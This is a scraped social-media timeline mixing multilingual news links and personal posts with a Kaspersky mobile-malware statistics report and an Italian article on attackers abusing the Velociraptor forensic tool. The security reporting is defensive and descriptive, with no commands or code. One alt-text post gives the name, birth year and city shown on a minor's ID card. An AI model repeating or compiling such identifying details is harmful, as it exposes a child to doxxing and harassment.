El consumo moderado de alcohol se asocia a menor mortalidad en pacientes con Parkinson según un estudio surcoreano
La investigación apunta a posibles efectos neuroprotectores y advierte que la abstinencia o el consumo elevado no ofrecen los mismos beneficiosVinetur
La digitalización redefine la venta de bebidas alcohólicas con inteligencia artificial y experiencias personalizadas
El sector apuesta por etiquetas inteligentes, asistentes virtuales y marketing digital para adaptarse a un consumidor más tecnológicoVinetur
Krachtigste supercomputer van Europa onthuld: 'Zo snel als miljoen smartphones'
Jupiter is de op drie na krachtigste ter wereld en kan gebruikt worden voor wetenschappelijk onderzoek en om AI-programma's te ontwikkelen.NOS Nieuws
IFA 2025: tutte le novità di Haier, Candy e Hoover
https://www.lastampa.it/tecnologia/2025/09/05/news/ifa_2025_tutte_le_novita_di_haier_candy_e_hoover-424828416/?utm_source=flipboard&utm_medium=activitypub
Pubblicato su La Stampa Tecnologia @la-stampa-tecnologia-LaStampa
IFA 2025: tutte le novità di Haier, Candy e Hoover
Non solo intelligenza artificiale, ma anche sondaggi tra i clienti per capire le loro reali esigenze: così nascono i nuovi elettrodomestici dei vari brand del …La Stampa
🇧🇷 The #BRICS summit in online format will be held on September 8 at the initiative of Brazil.
@ukraine_watch
Ukraine Watch
🇧🇷 The BRICS summit in online format will be held on September 8 at the initiative of Brazil. @ukraine_watchTelegram
🇧🇷 The #BRICS summit in online format will be held on September 8 at the initiative of Brazil.
@ukraine_watch
Ukraine Watch
🇧🇷 The BRICS summit in online format will be held on September 8 at the initiative of Brazil. @ukraine_watchTelegram
Call for Papers -- Plant Fever: Politics, Poetics, and Pleasures of Houseplants
eseh.org/cfp-plant-fever-a-con…
A Conference on Plant Humanities and Experimental Methodologies.
2–3 December 2025 | Copenhagen, Denmark
Deadline for submissions: September 15, 2025
I'll be 42 years old in a few weeks, and I want this to be an occasion to … not really reinvent myself, but renew who I am. Make some deliberate changes.
Regardless of how well you know me and how long you're following me here: What do you consider my strengths and weaknesses? What do you like & dislike about me? What would you like to see more of on this account, what less?
Feel free to answer in German or English, and of course these questions are just suggestions and not an assignment.
For all I know, you are able to reflect on yourself and your behavior. I highly appreciate that in people.
Do on this account whatever you like, please. Don’t shape yourself to our liking, you are not a product to consume 🫶
You are very kind, open-hearted and -minded, you care really much about people that are dear to you, you really seem to do a lot of things from a place of love and passion and selflessness. You have a fine attention to detail and quality, and a sense of aesthetics. You’re easygoing and fun to hang out with, and I like your voice 😀
As for weaknesses, to me it feels like sometimes you pick too many battles/get caught up in little things that eat up your energy.
Would Another OPEC+ Production Surge Really Crash Oil Prices?
https://www.bloomberg.com/news/newsletters/2025-09-05/would-another-opec-production-surge-really-crash-oil-prices?utm_source=flipboard&utm_medium=activitypub
Posted into Environment @environment-bloomberg
La Florida è pronta a eliminare tutti gli obblighi vaccinali, per la gioia dei no vax
https://www.wired.it/article/florida-fine-obblighi-vaccinali-reazioni-no-vax-robert-kennedy-jr/?utm_source=flipboard&utm_medium=activitypub
Pubblicato su Wired Italia @wired-italia-WiredItalia
La Florida è pronta a eliminare tutti gli obblighi vaccinali, per la gioia dei no vax
L'iniziativa dello stato è stata accolta con grandi esultanze dai complottisti e aderenti al movimento guidato dal segretario Kennedy Jr. Ma anche dalla paura degli espertiDavid Gilbert (Wired Italia)
reshared this
Seen on Peacemaker's credits. Does anyone know what a "lidar tech" does on a TV show? My first and only guess is that they use lidar to focus the cameras, but don't digital cameras do that more or less automatically? And does this mean that "focus puller" isn't a job anymore?
#askFedi #TV #film #tech #lidar #FocusPuller #photography
reshared this
Per favore potete firmare? 🙏
Gaza: libertà per il dottor Hussam Abu Safiya - Appelli - Amnesty International Italia subscribe.amnesty.it/appelli/g…
Gaza: libertà per il dottor Hussam Abu Safiya - Appelli - Amnesty International Italia
Il 27 dicembre l'esercito israeliano ha fatto irruzione nell'ospedale Kamal Adwan, e ha arrestato Hussam Abu Safiya. Firma ora l'appello!Amnesty International Italia
Andre123 reshared this.
AP Decision Notes: What to expect in Virginia's special congressional election
https://apnews.com/article/virginia-congressional-special-election-walkinshaw-whitson-connolly-b36cca1180df518e9ff9cba50f78ce16?utm_source=flipboard&utm_medium=activitypub
Posted into Politics @politics-AssociatedPress
AP Decision Notes: What to expect in Boston's mayoral primary
https://apnews.com/article/boston-mayor-primary-wu-kraft-8a17a36aeeae687a8fa9e8d93e0132f7?utm_source=flipboard&utm_medium=activitypub
Posted into Politics @politics-AssociatedPress
“The truth is not in him”
- Hunter Thompson on Nixon.
It has been said about some politicians that they don’t have the same concept or understanding of truth as the rest of us. To them it is only about if the statement maintains or furthers their agenda, that’s it, whether it is true or not is literally irrelevant.
I need tech help with #Electronics#RetroComputing#RetroConsoles#AtariCartridges
I ordered some multi-cart 2600 PCBs of three sizes. 8x8KB / 4x16KB and 16x4KB.
I foolishly did not check the full BOM on all of them and just assumed they all used standard 74x logic chips but it turns out that two of them need a programmable logic chip. The file is available and I have a programmer but the two options listed are both obsolete.
A web search is useless these days, I tried all sorts of "replacement for...", "alternative to..." and I can't get an answer. I don't know about these chips so I am hoping someone can tell me what alternatives still exist?
Can I use any chip with the correct number of pins and correct speed? What else might I need to consider?
(DIY) ATARI 2600 MULTI GAME CARTRIDGE 4X16KB - Share Project - PCBWay
You can make your own custom Atari 2600 Multi Game Cartridge.(16KB games) Hello, This is a simple,DIY multi game Atari 2600 cartridge. It has 4 games capacity each 16 kilobytes, total 64KB. All compon...www.pcbway.com
Yoox annuncia 211 licenziamenti in Italia. I sindacati proclamano sciopero da sedici ore
[quote]I lavoratori di Yoox Net a Porter scendono in campo contro l'annuncio di licenziamento collettivo da parte del colosso dello shopping online nelle sedi di Bologna e Milano
L'articolo Yoox annuncia 211 licenziamenti in Italia. I sindacati proclamano sciopero da
Anarchist Stickers Archive (@anarchist_stickers_archive@kolektiva.social)
Attached: 1 image "Capitalism will anyway, you decide when" (EN: English) Source: instagram:@anarchistposters Original: https://gateway.ipfs.anarchiststickersarchive.kolektiva.social
Music students play Yip, Yagisawa, Tchaikovsky and Orff in Hong Kong - Schedule // - www.worldconcerthall.com
Nancy Loo, piano, and the EdUHK Joint Orchestras conducted by Kelvin Ngai, Victor Tam and Lo Khin Yee perform: YIP Ho: Kwan Austin Ode to Birth. Satoshi YAGISAWA: Machu Picchu. TCHAIKOVSKY: Finale from Symphony No. 4 in F minor, Op. 36.www.worldconcerthall.com
ft.com/content/59355df0-0c0e-4…
Falling for Savings: This Week's Hottest Tech & Lifestyle Drops! #TodaysTechDeals
Harvest incredible autumn savings! Discover top deals on tech, gaming, home decor, and collectibles this week. Your guide to seasonal discounts.intelligentit.blogspot.com
A whole new world: Jasmine harvests have sustained thousands of families in Egypt’s Nile Delta over many generations, but rising temperatures, long dry spells and climate-driven pests have left that legacy in peril.
Photo: Khaled Desouki/AFP
Sensitive content
What is shared is the Nimbus code inside of Chrome that is already used in Mozilla and the court did not even approach this.
Chrome is a weapon in the hands of those who know how to wield it.
#Israel
Google will still stand trial on it's monopoly advertising abuse, in this instance also, much wrongdoing is ignored. Google has real grifters.
🤖 Tracking strings detected and removed!
🔗 Clean URL(s):
x.com/skymeds_store/status/196…
❌ Removed parts:
?s=46
For day 5 of #SciArtSeptember prompt corridor I am sharing the pollinator garden work which I made for my show about the future of pollination for Manufactured Ecosystems. Using collaged linocut prints I built up this little garden with multiple native wildflowers, bees, moths, butterflies, beetles and a log, complete with some holes as homes for native bees. 🧵1/n
#printmaking #wildflowers #sciart #pollination #monarchButterfly #EasternSwallowtail #bumblebee #sweatBee #mastoArt
🧵2/3
#Today 05
Good day!
What a day yesterday!
Discovered that I’d lost 4 lbs. I then walked all the faster with my trekking poles in the cooler weather.
Caught fire on the backstory novella & added 2,585 words. My fingers were flying.
Still managed to edit a Book4 chapter.
Be everwell.
#WritingLife #AmWriting #WritingCommunity #Aging #HealthyLiving #HealthyLifestyle #GetOutside #Hiking #Trails #HikingAdventures #Nature #NaturePhotography #NatureLover #Photography #LandscapePhotography
ah ah ah ah ah ah ah ah ah
como é que é?
meri quê?
🔗 jn.pt/pais/artigo/reitor-do-po…
Reitor do Porto denuncia "pressões" para aceitar entradas ilegais em Medicina
O reitor da Universidade do Porto denunciou ter recebido pressões de várias pessoas para deixar entrar na Faculdade de Medicina 30 candidatos que não tinham obtido a classificação mínima na prova exigida no curso especial de acesso.JN/Agências (Jornal de Notícias)
La riforma dell'Esame di Stato è non-sense.
1) D'ora in poi si chiamerà esame di maturità ufficialmente, ricalcando una denominazione nata con la riforma Gentile...
2) Da 6 commissariə si passa a 4. Qual è il senso didattico di ciò? Forse solo il risparmio economico...
3) Dopo le proteste di giugno scorso, ufficiale che chi si rifiuta di fare l'orale verrà bocciatə. Repressione totale...
Quando poi uscirà il decreto proverò a scriverne sul blog, ma intanto questi mi sembrano i punti salienti.
reshared this
Ringrazio al cielo mio fratello ha finito l'ultimo anno di scuola da poco così che non ne possiamo più preoccupare della scuola.
Il sistema scolastico sta già marcendo D:
sará, ma andando avanti così l'istruzione sarà sempre più in mano ai privati (è già così in ambito universitario)
@khulewampe
We’re friends despite our 58-year age gap
Friends Zahabia, 20, and Alan, 78, work on an allotment together and post on TikTok about gardening and their friendship.www.bbc.com
reshared this
securityaffairs.com/181924/hac…
#securityaffairs #hacking
U.S. CISA adds Sitecore, Android, and Linux flaws to its Known Exploited Vulnerabilities catalog
U.S. CISA adds Sitecore, Android, and Linux vulnerabilities to its Known Exploited Vulnerabilities catalog.Pierluigi Paganini (Security Affairs)
Cybersecurity & cyberwarfare reshared this.
Friday again! Another 10 lyrics to guess. I'm probably giving away my age with this set (if I haven't already).
Last week five participants guessed seven, let's see if we can clear the board this time!
Right. Where can I get an authentic Labubu from in the UK please?
(Niece's birthday and I'm having a nightmare)
Mosca avverte l’Ue: “Truppe in Ucraina bersaglio legittimo”. Zelensky: “Garanzie subito”
[quote]MOSCA – Le “truppe occidentali in Ucraina sono un bersaglio legittimo”. Le dure parole del presidente russo Vladimir Putin riassumono la presa di posizione del Cremlino nei confronti dell’Europa. A…
L'articolo Mosca avverte l’Ue: “Truppe in Ucraina bersaglio
Associazione Peacelink reshared this.
reshared this
Thanks for sharing!
Just a bit of alt text would make it even better 
:
The image is a six-panel meme featuring a character with glasses and a bald head, representing "us," and a group of identical characters labeled "CEOs." The panels depict a humorous exchange about the desire for AI. In the first panel, "us" asks, "WHO ARE WE?" The CEOs respond with "CEOs." The second panel shows "us" asking, "WHAT DO WE WANT?" The CEOs reply, "AI!" In the third panel, "us" inquires, "AI TO DO WHAT?" The CEOs answer, "WE DON'T KNOW!" The fourth panel asks, "WHEN DO WE WANT IT?" The CEOs exclaim, "RIGHT NOW!" The final panel shows "us" looking confused, while the CEOs are all shouting in unison.
i'll never fall in love/ again
it's over now
biscuit, portishead, iv.duti.dev/watch?v=FRntBOQsNY…
IT threat evolution in Q2 2025. Mobile statistics
IT threat evolution in Q2 2025. Non-mobile statistics
The mobile section of our quarterly cyberthreat report includes statistics on malware, adware, and potentially unwanted software for Android, as well as descriptions of the most notable threats for Android and iOS discovered during the reporting period. The statistics in this report are based on detection alerts from Kaspersky products, collected from users who consented to provide anonymized data to Kaspersky Security Network.
Quarterly figures
According to Kaspersky Security Network, in Q2 2025:
- Our solutions blocked 10.71 million malware, adware, and unwanted mobile software attacks.
- Trojans, the most common mobile threat, accounted for 31.69% of total detected threats.
- Just under 143,000 malicious installation packages were detected, of which:
- 42,220 were mobile banking Trojans;
- 695 packages were mobile ransomware Trojans.
Quarterly highlights
Mobile attacks involving malware, adware, and unwanted software dropped to 10.71 million.
Attacks on users of Kaspersky mobile solutions, Q4 2023 — Q2 2025 (download)
The trend is mainly due to a decrease in the activity of RiskTool.AndroidOS.SpyLoan. These are applications typically associated with microlenders and containing a potentially dangerous framework for monitoring borrowers and collecting their data, such as contacts lists. Curiously, such applications have been found pre-installed on some devices.
In Q2, we found a new malicious app for Android and iOS that was stealing images from the gallery. We were able to determine that this campaign was linked to the previously discovered SparkCat, so we dubbed it SparkKitty.
Fake app store page distributing SparkKitty
Like its “big brother”, the new malware most likely targets recovery codes for crypto wallets saved as screenshots.
Trojan-DDoS.AndroidOS.Agent.a was this past quarter’s unusual discovery. Malicious actors embedded an SDK for conducting dynamically configurable DDoS attacks into apps designed for viewing adult content. The Trojan allows for sending specific data to addresses designated by the attacker at a set frequency. Building a DDoS botnet from mobile devices with adult apps installed may seem like a questionable venture in terms of attack efficiency and power – but apparently, some cybercriminals have found a use for this approach.
In Q2, we also encountered Trojan-Spy.AndroidOS.OtpSteal.a, a fake VPN client that hijacks user accounts. Instead of the advertised features, it uses the Notification Listener service to intercept OTP codes from various messaging apps and social networks, and sends them to the attackers’ Telegram chat via a bot.
Mobile threat statistics
The number of Android malware and potentially unwanted app samples decreased from Q1, reaching a total of 142,762 installation packages.
Detected malware and potentially unwanted app installation packages, Q2 2024 — Q2 2025 (download)
The distribution of detected installation packages by type in Q2 was as follows:
Detected mobile malware by type, Q1 — Q2 2025 (download)
* Data for the previous quarter may differ slightly from previously published data due to some verdicts being retrospectively revised.
Banking Trojans remained in first place, with their share increasing relative to Q1. The Mamont family continues to dominate this category. In contrast, spy Trojans dropped to fifth place as the surge in the number of APK files for the SMS-stealing Trojan-Spy.AndroidOS.Agent.akg subsided. The number of Agent.amw spyware files, which masquerade as casino apps, also decreased.
RiskTool-type unwanted apps and adware ranked second and third, respectively, while Trojans – with most files belonging to the Triada family – occupied the fourth place.
Share* of users attacked by the given type of malicious or potentially unwanted apps out of all targeted users of Kaspersky mobile products, Q1 — Q2 2025 (download)
* The total may exceed 100% if the same users experienced multiple attack types.
The distribution of attacked users remained close to that of the previous quarter. The increase in the share of backdoors is linked to the discovery of Backdoor.Triada.z, which came pre-installed on devices. As for adware, the proportion of users affected by the HiddenAd family has grown.
TOP 20 most frequently detected types of mobile malware
Note that the malware rankings below exclude riskware or potentially unwanted software, such as RiskTool or adware.
| Verdict | %* Q1 2025 | %* Q2 2025 | Difference (p.p.) | Change in rank |
| Trojan.AndroidOS.Fakemoney.v | 26.41 | 14.57 | -11.84 | 0 |
| Trojan-Banker.AndroidOS.Mamont.da | 11.21 | 12.42 | +1.20 | +2 |
| Backdoor.AndroidOS.Triada.z | 4.71 | 10.29 | +5.58 | +3 |
| Trojan.AndroidOS.Triada.fe | 3.48 | 7.16 | +3.69 | +4 |
| Trojan-Banker.AndroidOS.Mamont.ev | 0.00 | 6.97 | +6.97 | |
| Trojan.AndroidOS.Triada.gn | 2.68 | 6.54 | +3.86 | +3 |
| Trojan-Banker.AndroidOS.Mamont.db | 16.00 | 5.50 | -10.50 | -4 |
| Trojan-Banker.AndroidOS.Mamont.ek | 1.83 | 5.09 | +3.26 | +7 |
| DangerousObject.Multi.Generic. | 19.30 | 4.21 | -15.09 | -7 |
| Trojan-Banker.AndroidOS.Mamont.eb | 1.59 | 2.58 | +0.99 | +7 |
| Trojan.AndroidOS.Triada.hf | 3.81 | 2.41 | -1.40 | -4 |
| Trojan-Downloader.AndroidOS.Dwphon.a | 2.19 | 2.24 | +0.05 | 0 |
| Trojan-Banker.AndroidOS.Mamont.ef | 2.44 | 2.20 | -0.24 | -2 |
| Trojan-Banker.AndroidOS.Mamont.es | 0.05 | 2.13 | +2.08 | |
| Trojan-Banker.AndroidOS.Mamont.dn | 1.46 | 2.13 | +0.67 | +5 |
| Trojan-Downloader.AndroidOS.Agent.mm | 1.45 | 1.56 | +0.11 | +6 |
| Trojan-Banker.AndroidOS.Agent.rj | 1.86 | 1.45 | -0.42 | -3 |
| Trojan-Banker.AndroidOS.Mamont.ey | 0.00 | 1.42 | +1.42 | |
| Trojan-Banker.AndroidOS.Mamont.bc | 7.61 | 1.39 | -6.23 | -14 |
| Trojan.AndroidOS.Boogr.gsh | 1.41 | 1.36 | -0.06 | +3 |
* Unique users who encountered this malware as a percentage of all attacked users of Kaspersky mobile solutions.
The activity of Fakemoney scam apps noticeably decreased in Q2, but they still held the top position. Almost all the other entries on the list are variants of the popular banking Trojan Mamont, pre-installed Trojans like Triada and Dwphon, and modified messaging apps with the Triada Trojan built in (Triada.fe, Triada.gn, Triada.ga, and Triada.gs).
Region-specific malware
This section describes malware types that mostly affected specific countries.
| Verdict | Country* | %** |
| Trojan-Banker.AndroidOS.Coper.c | Türkiye | 98.65 |
| Trojan-Banker.AndroidOS.Coper.a | Türkiye | 97.78 |
| Trojan-Dropper.AndroidOS.Rewardsteal.h | India | 95.62 |
| Trojan-Banker.AndroidOS.Rewardsteal.lv | India | 95.48 |
| Trojan-Dropper.AndroidOS.Agent.sm | Türkiye | 94.52 |
| Trojan.AndroidOS.Fakeapp.hy | Uzbekistan | 86.51 |
| Trojan.AndroidOS.Piom.bkzj | Uzbekistan | 85.83 |
| Trojan-Dropper.AndroidOS.Pylcasa.c | Brazil | 83.06 |
* The country where the malware was most active.
** Unique users who encountered this Trojan variant in the indicated country as a percentage of all Kaspersky mobile security solution users attacked by the same variant.
In addition to the typical banking Trojans for this category – Coper, which targets users in Türkiye, and Rewatrdsteal, active in India – the list also includes the fake job search apps Fakeapp.hy and Piom.bkzj, which specifically target Uzbekistan. Both families collect the user’s personal data. Meanwhile, new droppers named “Pylcasa” operated in Brazil. They infiltrate Google Play by masquerading as simple apps, such as calculators, but once launched, they open a URL provided by malicious actors – similar to Trojans of the Fakemoney family. These URLs may lead to illegal casino websites or phishing pages.
Mobile banking Trojans
The number of banking Trojans detected in Q2 2025 was slightly lower than in Q1 but still significantly exceeded the figures for 2024. Kaspersky solutions detected a total of 42,220 installation packages of this type.
Number of installation packages for mobile banking Trojans detected by Kaspersky, Q2 2024 — Q2 2025 (download)
The bulk of mobile banking Trojan installation packages still consists of various modifications of Mamont, which account for 57.7%. In terms of the share of affected users, Mamont also outpaced all its competitors, occupying nearly all the top spots on the list of the most widespread banking Trojans.
TOP 10 mobile bankers
| Verdict | %* Q1 2025 | %* Q2 2025 | Difference (p.p.) | Change in rank |
| Trojan-Banker.AndroidOS.Mamont.da | 26.68 | 30.28 | +3.59 | +1 |
| Trojan-Banker.AndroidOS.Mamont.ev | 0.00 | 17.00 | +17.00 | |
| Trojan-Banker.AndroidOS.Mamont.db | 38.07 | 13.41 | -24.66 | -2 |
| Trojan-Banker.AndroidOS.Mamont.ek | 4.37 | 12.42 | +8.05 | +2 |
| Trojan-Banker.AndroidOS.Mamont.eb | 3.80 | 6.29 | +2.50 | +2 |
| Trojan-Banker.AndroidOS.Mamont.ef | 5.80 | 5.36 | -0.45 | -2 |
| Trojan-Banker.AndroidOS.Mamont.es | 0.12 | 5.20 | +5.07 | +23 |
| Trojan-Banker.AndroidOS.Mamont.dn | 3.48 | 5.20 | +1.72 | +1 |
| Trojan-Banker.AndroidOS.Agent.rj | 4.43 | 3.53 | -0.90 | -4 |
| Trojan-Banker.AndroidOS.Mamont.ey | 0.00 | 3.47 | +3.47 | 9 |
Conclusion
In Q2 2025, the number of attacks involving malware, adware, and unwanted software decreased compared to Q1. At the same time, Trojans and banking Trojans remained the most common threats, particularly the highly active Mamont family. Additionally, the quarter was marked by the discovery of the second spyware Trojan of 2025 to infiltrate the App Store, along with a fake VPN client stealing OTP codes and a DDoS bot concealed within porn-viewing apps.
securelist.com/malware-report-…
The image shows a Google search page with the query "王畅睿" (Wáng chàng ruì) entered in the search bar. The search results are displayed in Chinese, with the first result showing an ID card image of a male named Wang Changrui, born in 2008, with the address listed as Shanghai. The second result is a manga image. Below the search results, there is an Instagram profile for "王畅睿 ([@]bukaixyz)" with over 10 followers. The page includes options to view more images and navigate through the search results.
Provided by @altbot, generated privately and locally using Ovis2-8B
🌱 Energy used: 0.166 Wh
Gli aggressori utilizzano Velociraptor per gli attacchi informatici. Rapid7 è al corrente
Gli specialisti della sicurezza di Sophos hanno attirato l’attenzione su un attacco informatico in cui aggressori sconosciuti hanno utilizzato lo strumento forense open source Velociraptor per monitorare gli endpoint .
“In questo incidente, gli aggressori hanno utilizzato uno strumento per scaricare ed eseguire Visual Studio Code con il probabile intento di creare un tunnel verso un server di comando e controllo”, hanno affermato gli esperti della Sophos Counter Threat Unit.
Il rapporto sottolinea che gli aggressori spesso impiegano tattiche di tipo “living-off-the-land” (LotL) e utilizzano legittimi strumenti di monitoraggio e controllo remoto negli attacchi, ma l’uso di Velociraptor segnala un’evoluzione di tali tattiche, in cui il software di risposta agli incidenti viene utilizzato per scopi dannosi.
L’analisi dell’incidente ha mostrato che gli aggressori hanno utilizzato l’utility msiexec di Windows per scaricare un programma di installazione MSI dal dominio Cloudflare Workers, che funge anche da area di staging per altre soluzioni utilizzate dagli hacker, tra cui lo strumento di tunneling Cloudflare e l’utility di amministrazione remota Radmin.
Il file MSI è stato progettato per distribuire Velociraptor, che avrebbe poi comunicato con un altro dominio Cloudflare Workers. L’accesso è stato quindi utilizzato per scaricare Visual Studio Code dallo stesso server di staging utilizzando un comando PowerShell codificato ed eseguirlo con l’opzione di tunneling abilitata per consentire sia l’accesso remoto che l’esecuzione di codice remoto.
Inoltre, è stato osservato che gli aggressori riutilizzavano l’utilità msiexec di Windows per scaricare payload aggiuntivi. “Le organizzazioni dovrebbero monitorare e indagare sull’uso non autorizzato di Velociraptor e considerare l’impiego di tali tattiche come un precursore della distribuzione di ransomware”, avverte Sophos.
In seguito alla pubblicazione di questo rapporto da parte di Sophos, la società di sicurezza Rapid7, che sviluppa Velociraptor, ha pubblicato un white paper che spiega nel dettaglio come le organizzazioni possono rilevare l’abuso di Velociraptor nei loro ambienti.
“Rapid7 è a conoscenza di segnalazioni di abusi dello strumento open source di risposta agli incidenti Velociraptor. Velociraptor è ampiamente utilizzato dai difensori per scopi legittimi di analisi forense digitale e risposta agli incidenti. Ma come molti altri strumenti di sicurezza e amministrazione, può essere utilizzato per scopi dannosi se finisce nelle mani sbagliate”, commentano gli sviluppatori.
L'articolo Gli aggressori utilizzano Velociraptor per gli attacchi informatici. Rapid7 è al corrente proviene da il blog della sicurezza informatica.
joene 🏴🍉
in reply to Faye • • •"Textgain ontwikkelt computerprogramma's om in alle officiële Europese talen scheldwoorden, dreigementen en andere haatdragende berichten op het internet te herkennen."
Klinkt in eerste instantie leuk, maar is dus eigenlijk een grote censuurmachine.